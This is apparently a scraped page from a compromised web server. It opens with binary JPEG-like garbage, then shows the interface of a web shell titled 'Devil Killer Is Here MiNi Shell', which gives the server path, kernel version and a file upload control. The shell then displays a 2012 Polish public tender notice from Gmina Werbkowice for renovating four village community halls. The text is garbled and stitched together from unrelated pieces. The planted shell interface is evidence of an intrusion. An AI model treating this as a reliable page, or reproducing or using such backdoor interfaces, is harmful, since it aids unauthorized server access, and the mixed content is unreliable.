JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120202/31844-N-2012.html

<p class="kh_header"><b>Werbkowice: Remont  budynków  świetlic w  miejscowościach :  Peresołowice ; Dobromierzyce ;  Hostynne i Podhorce</b><br>
<b>Numer ogłoszenia: 31844 - 2012; data zamieszczenia: 02.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Werbkowice reprezentowana przez Wójta Gminy , ul. Zamojska 1, 22-550 Werbkowice, woj. lubelskie, tel. 084 6572003 w. 33, faks 084 6572080.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminawerbkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  budynków  świetlic w  miejscowościach :  Peresołowice ; Dobromierzyce ;  Hostynne i Podhorce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest-  Remont  budynków  świetlic w  miejscowościach   Peresołowice ,Dobromierzyce ,  Hostynne i Podhorce 
1.  Opis przedmiotu zamówienia.

Zadanie  nr 1 
 Nazwa  zadania   Remont  budynku świetlico   -  remizy w  miejscowości  Peresołowice 
 Opis ważniejszych  elementów  zadania  
1. Roboty  rozbiórkowe 
a) Rozbiórka sufitu  podwieszanego z płyt  pilśniowych twardych  kasetonowych -  101,91 m 2,
b) Rozebranie  pokrycia  dachowego z  płyt azbestowo - cementowych   płaskich  - 240,30  m 2 ,
c) Rozebranie  boazerii z  płyt  pilśniowych - 29,80  m 2.
2. Roboty  remontowe 
a)  Docieplenie  ścian zewnętrznych   budynku  styropianem  grubości 10  cm  z  wyprawą elewacyjna  - 317,79m 2 ,
b) Docieplenie  ścian  cokołu  styropianem  grub. 10  cm  z  wyprawą  elewacyjną na głębokość  20 cm poniżej  poziomu  terenu - 46,80 2,
c)  Pokrycie  dachów  blacha  trapezową  w  kolorze  brązowym - 325,96 m 2 ,
d) pełnie  obróbki  blacharskie ,
e) Wykonanie  posadzek  z  płytek  kamionkowych   GRES antypoślizgowych  i mrozoodpornych   20 X 30  -  224,93 m 2 ,
f) wykonanie  cokołów  z  płytek  kamionkowych 108,70 m2 ,
g) Wykonanie  sufitów  podwieszanych  o  konstrukcji  metalowej  z  wypełnieniem płytami  gipsowo  - kartonowymi - 101,91 m 2 ,
h) Wykonanie  opaski  odwadniającej  wokół  budynku z kostki  brukowej betonowej - 55,84 m 2,                
i) wymiana  stolarki okiennej i drzwiowej .
Zadanie Nr 2 
Nazwa  zadania -  Remont  i  modernizacja  budynku świetlicy w  miejscowości  Dobromierzyce 
 Opis ważniejszych  elementów  zadania  
1. Wymiana  stolarki okiennej i drzwiowej   ,

2. Wykonanie  ścianki  działowej  - 9,04 m 2 ,
3. Wykonanie  tynku  - 18,48 m 2,
4. Malowanie ścian  emulsjami wewnętrznymi  - 28,58 m2,
5. Wykonanie  posadzki z  płytek terakotowych - 5,34 m  2,
6. Wykonanie  instalacji zewnętrznej   wodociągowej - 10,0 m,
7. Wykonanie  przyłącza  kanalizacyjnego - 40 mm - 6,90 m. 

Zadanie Nr 3 
Nazwa  zadania -  Remont    budynku świetlicy w  miejscowości   Hostynne 
 Opis ważniejszych  elementów  zadania   
1.  Roboty  rozbiórkowe 
a) Rozebranie  pokrycia  dachowego z  płyt azbestowo -  cementowych falistych - 198,70 m 2,
b) Rozebranie  sufitu  podwieszanego z płyt pilśniowych  twardych kasetonowych  - 118,93 m  2,
2. Roboty  remontowe 
a) Docieplenie ścian zewnętrznych cokołu - 20,20 m 2 ,
b) Docieplenie ścian zewnętrznych  budynku   styropianem  twardym  grubości 15  cm  z wyprawa  elewacyjną  i malowaniem - 178,35 m 2,
c)Pokrycie  dachów  połaci blachą  ocynkowana  trapezową - 239,68 m 2 ,
d) Pełnie  obróbki  blacharskie ,
e) Wymiana  stolarki okiennej i drzwiowej ,
f)  Wymiana  części  podłogi  z desek struganych grubości 32 mm - 59,47 m 2,
g) Wykonanie posadzki z  płytek  terakotowych  - 41,82 m 2,
h)Wykonanie  sufitów  podwieszanych  o konstrukcji metalowej  z wypełnieniem płytami gipsowo - kartonowymi - 160,75 m 2,
i)Malowanie  farbami  emulsyjnymi  - 161,16 m 2 ,
j) Oczyszczenie  i malowanie  boazerii drewnianej  lakierem bezbarwnym - 61,88 m 2,
k) Wykonanie  opaski  betonowej wokół  budynku - 21,0 m 2,
l)Wykonanie  opaski odwadniającej  z kostki  brukowej betonowej - 30,00 m2 
Zadanie Nr 4 
Nazwa  zadania -  Remont    budynku świetlicy- remizy  w  miejscowości   Podhorce  
 Opis ważniejszych  elementów  zadania  
1.  Wymiana  stolarki  okiennej i  drzwiowej ;
2. Rozebranie  sufity  podwieszanego  z płyt  pilśniowych twardych -114,75 m 2,
3. Rozebranie  pokrycia  dachowego  z  blachy 335,0 m 2,
4.Docieplenie  ścian  zewnętrznych  budynku styropianem  grubości 15  cm wraz z  wyprawą  elewacyjną   - 117,49 m 2 ,
5. Docieplenie ścian zewnętrznych budynku  styropianem grubości 10  cm  z  wyprawa elewacyjną -101,05 m 2,
6.Malowanie  elewacji zewnętrznych  budynku- 224,54 m 2 ,
7.Pokrycie  dachów  blachą ocynkowana  powlekaną- 375,67  m 2 ,
8. Pełnie  obróbki  blacharskie ,
9. Wykonanie  posadzek z  płytek  terakotowych  20 x 25  cm - 84,31 m 2 ,
Sufity  podwieszane  o  konstrukcji  metalowej z  wypełnieniem płytami gipsowo - kartonowymi  - 260,30  m 2 ,
10. Wykonanie  opaski odwadniającej z  kostki  brukowej betonowej - 65,60 m 2  

2. Szczegółowy opis przedmiotu zamówienia określają 
a)  projekty budowlane stanowiący Załączniki  do SIWZ-  szt. 4
b)  Specyfikacja  techniczna  wykonania  i  odbioru  robót  budowlanych stanowiąca 
Załączniki do SIWZ-  szt. 4
c)  przedmiar robót stanowiący Załącznik do SIWZ-  szt. 4 
3. W związku z zamieszczeniem w opisie przedmiotu zamówienia norm, aprobat
 i innych systemów odniesienia, zamawiający, na podstawie art. 30 ust. 4 Pzp, 
dopuszcza rozwiązania równoważne opisywanym. 
4.  Zgodnie z art. 30 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że
 oferowane przez niego roboty budowlane spełniają wymagania określone przez zamawiającego; wykonawca wraz z oferta składa oświadczenie, że oferowane 
przez niego roboty budowlane spełniają wymagania określone przez zamawiającego
 w opisie przedmiotu zamówienia. Wzór oświadczenia stanowi Załącznik nr 4 
do SIWZ.
Uwaga- W  przypadku użycia  w SIWZ , przy  opisie przedmiotu  zamówienia 
 nazwy  producenta , znaku  towarowego , patentu  lub pochodzenia w odniesieniu 
do określonych  materiałów    , urządzeń  itp.      Zamawiający  wymaga ,  aby
  traktować takie wskazania  jako przykładowe i  dopuszcza zastosowanie  przy 
 realizacji zamówienia   materiałów , urządzeń , itp.  o równoważnych  parametrach  nie  gorszych  niż  wskazane ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.44.30.00-4, 45.26.12.10-9, 45.42.11.00-5, 45.43.21.00-5, 45.44.21.00-8, 45.42.11.46-9, 45.23.24.51-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WADIUM
1. Ustala się wadium w wysokości  2.000,00  zł. (słownie- sto tysięcy) dla  każdego  zadania 
2. Wadium należy wnieść w terminie do dnia 24.02.2012  do godz. 10:00
3. Wadium można wnieść w jednej lub kilku następujących formach:
a) w pieniądzu wyłącznie na konto Zamawiającego  BS Werbkowice 
Nr rachunku : 2096420009 2001 0000 06190005 z dopiskiem                 wadium do przetargu  Nr ZP.270.1.2012 nr  zadania ( wpisać)  - o wniesieniu wadium decyduje moment wpływu wadium na rachunek Zamawiającego. Dowód wpłacenia wadium można dołączyć do oferty lub przedłożyć komisji przetargowej w dniu przetargu. 
C) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -   kredytowej z tym, że poręczenie kasy jest poręczeniem pieniężnym,
d)gwarancjach bankowych,
e)gwarancjach ubezpieczeniowych,
f)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.        5 pkt. 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości(Dz. U. Nr 109 poz. 1158, z późn. zm.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga posiadania niezbędnej wiedzy i doświadczenia tj.              w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy w tym okresie,  wykonania minimum jednej roboty odpowiadającej rodzajem robocie będącej przedmiotem zamówienia. Za robotę odpowiadającą swoim rodzajem  robotom stanowiącym przedmiot zamówienia, Zamawiający  uzna co najmniej  dwie roboty budowlane     o    wartości  nie  mniejszej  niż  100.000,00 złotych  brutto  każda  , które  swoim  zakresem  obejmowały   remont  lub budowę budynków  kubaturowych .
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
1) wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania  warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania osobami zdolnymi do wykonania zamówienia. Zamawiający  uzna  warunek za spełniony , jeżeli  Wykonawca  wykaże dysponowanie następującymi osobami uprawnionymi do  pełnienia samodzielnych  funkcji  technicznych w budownictwie  o specjalnościach :
	1)   branży  konstrukcyjno  -  budowlanej 
Warunek zostanie spełniony po przedłożeniu wykazu i oświadczenia jn:
1) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia,                       w szczególności z uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie odpowiedzialnych za kierowanie robotami budowlanymi  w specjalnościach: 
 branży  konstrukcyjno -  budowlanej    , z jednoczesnym pełnieniem funkcji kierownika budowy
 wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
2) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia . 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał  się sytuacją ekonomiczną         i finansową zapewniającą wykonanie zamówienia, a w szczególności wykażą: 
1. jest  ubezpieczony od  odpowiedzialności   cywilnej    od  prowadzonej  działalności na  kwotę min. 200.000,00   złotych      
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.
Jeśli wykonawca z uzasadnionej przyczyny nie może przedstawić wymaganych dokumentów celem potwierdzenia spełniania warunku dotyczącego jego sytuacji ekonomicznej i finansowej, może przedłożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający - na podstawie art. 144 ust. 1 ustawy PZP - zastrzega sobie prawo do zmiany treści istotnych postanowień umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy               w sprawie zamówienia publicznego.
a)  wystąpienia zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 Pzp
b)  zmiany osoby z uprawnieniami budowlanymi do kierowania robotami budowlanymi
 w zakresie niezbędnym do wykonania zamówienia na osobę posiadająca uprawnienia
 wymagane w opisie sposobu dokonywania oceny spełniania warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia. 
c)Termin  realizacji  zamówienia  może  ulec  przedłużeniu w  następujących sytuacjach:
1. w  przypadku  braków  lub wad dokumentacji projektowej lub  innych  dokumentów niezbędnych  do  realizacji  budowy 
2. wystąpienia warunków atmosferycznych uniemożliwiających lub utrudniających
 prawidłowe wykonywanie zamówienia, 
4. błędy lub  niezgodności ze  stanem faktycznym stwierdzone  w  dokumentacji 
projektowej  i  wymagające zgłoszenia zamawiającemu na  podstawie  art. 651  Kodeksu  cywilnego .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminawerbkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy  Werbkowice 
22-550 Werbkowice 
ul. Zamojska 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 10:00, miejsce: Urząd  Gminy  Werbkowice 
22-550 Werbkowice 
ul. Zamojska 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie Nr 1,3 i 4  w ramach  działania 413 Wdrażanie Lokalnych strategii Rozwoju w  zakresie operacji odpowiadajacych  warunkom przyznania pomocy w ramach działania  Odnowa i Rozwój wsi  objetego PROW na  lata 2007-2013 .
Zadanie  Nr 2  w ramach  działania 413  Wdrażanie lokalnych strategii rozwoju objętego PROW na  lata  2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont  budynku świetlico   -  remizy w  miejscowości  Peresołowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Roboty  rozbiórkowe 
a) Rozbiórka sufitu  podwieszanego z płyt  pilśniowych twardych  kasetonowych -  101,91 m 2,
b) Rozebranie  pokrycia  dachowego z  płyt azbestowo - cementowych   płaskich  - 240,30  m 2 ,
c) Rozebranie  boazerii z  płyt  pilśniowych - 29,80  m 2.
2. Roboty  remontowe 
a)  Docieplenie  ścian zewnętrznych   budynku  styropianem  grubości 10  cm  z  wyprawą elewacyjna  - 317,79m 2 ,
b) Docieplenie  ścian  cokołu  styropianem  grub. 10  cm  z  wyprawą  elewacyjną na głębokość  20 cm poniżej  poziomu  terenu - 46,80 2,
c)  Pokrycie  dachów  blacha  trapezową  w  kolorze  brązowym - 325,96 m 2 
d) pełnie  obróbki  blacharskie ,
e) Wykonanie  posadzek  z  płytek  kamionkowych   GRES  antypoślizgowych  i mrozoodpornych   20 X 30  -  224,93 m 2 ,
f) wykonanie  cokołów  z  płytek  kamionkowych 108,70 m2 ,
g) Wykonanie  sufitów  podwieszanych  o  konstrukcji  metalowej  z  wypełnieniem płytami  gipsowo  - kartonowymi - 101,91 m 2 ,
h) Wykonanie  opaski  odwadniającej  wokół  budynku z kostki  brukowej betonowej - 55,84 m 2,
i) wymiana  stolarki okiennej i drzwiowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.44.30.00-4, 45.26.12.10-9, 45.42.11.00-5, 45.44.21.00-8, 45.42.11.46-9, 45.23.24.51-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont  i  modernizacja  budynku świetlicy w  miejscowości  Dobromierzyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wymiana  stolarki okiennej i drzwiowej   ,
2. Wykonanie  ścianki  działowej  - 9,04 m 2 
3. Wykonanie  tynku  - 18,48 m 2,
4. Malowanie ścian  emulsjami wewnętrznymi  - 28,58 m2,
5. Wykonanie  posadzki z  płytek terakotowych - 5,34 m  2,
6. Wykonanie  instalacji zewnętrznej   wodociągowej - 10,0 m,
7. Wykonanie  przyłącza  kanalizacyjnego - 40 mm - 6,90 m..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.44.21.00-8, 45.42.11.52-4, 45.43.21.00-5, 45.42.11.00-5, 45.33.22.00-5.</p></li>
